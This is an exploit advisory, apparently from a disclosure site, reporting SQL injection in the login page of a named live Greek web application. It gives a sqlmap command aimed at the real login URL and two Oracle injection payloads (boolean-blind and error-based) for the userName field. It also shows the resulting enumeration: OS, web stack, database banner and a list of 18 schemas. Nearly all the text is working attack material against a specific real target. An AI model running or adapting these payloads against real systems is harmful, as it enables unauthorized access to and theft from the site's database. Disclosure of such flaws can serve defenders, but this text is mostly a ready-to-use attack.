(EAP 6) NRDBP - Login İconectiv Version 3.2.0.6 | SQL Injection Vulnerability

2022.03.18
tr 0x01369 (TR) tr
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: (EAP 6) NRDBP - Login İconectiv Version 3.2.0.6 | SQL Injection Vulnerability # Author: Чингис хаан # Tested On: Kali Linux # sqlmap -u sqlmap -u "https://www.nrdbp.gr/NrdbpWeb/login.do" --form --current-db --dbs --banner --batch --------------------------------------------------------------------------------------------------- NRDBP - Login (EAP 6) İconectiv Version 3.2.0.6 https://www.nrdbp.gr/NrdbpWeb/login.do --- Parameter: userName (POST) Type: boolean-based blind Title: Oracle AND boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN) Payload: userName=RopA' AND (SELECT (CASE WHEN (1251=1251) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,1251) END) FROM DUAL) IS NULL-- nLLF&password=&submit=Login&face=kpDr&systemTime=20:56:19 Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS) Payload: userName=RopA' AND 8689=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(118)||CHR(112)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (8689=8689) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113))-- DUzD&password=&submit=Login&face=kpDr&systemTime=20:56:19 --- the back-end DBMS is Oracle web server operating system: Linux Red Hat Enterprise 6 (Santiago) web application technology: JSP 2.2, Apache 2.2.15 back-end DBMS: Oracle banner: 'Oracle Database 11g Enterprise Edition Release 11.2.0.4.0 - 64bit Production' available databases [18]: [*] APEX_030200 [*] APPQOSSYS [*] CTXSYS [*] DBSNMP [*] EXFSYS [*] FLOWS_FILES [*] MDSYS [*] NRDBP [*] OLAPSYS [*] ORDDATA [*] ORDSYS [*] OUTLN [*] OWBSYS [*] SYS [*] SYSMAN [*] SYSTEM [*] WMSYS [*] XDB


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top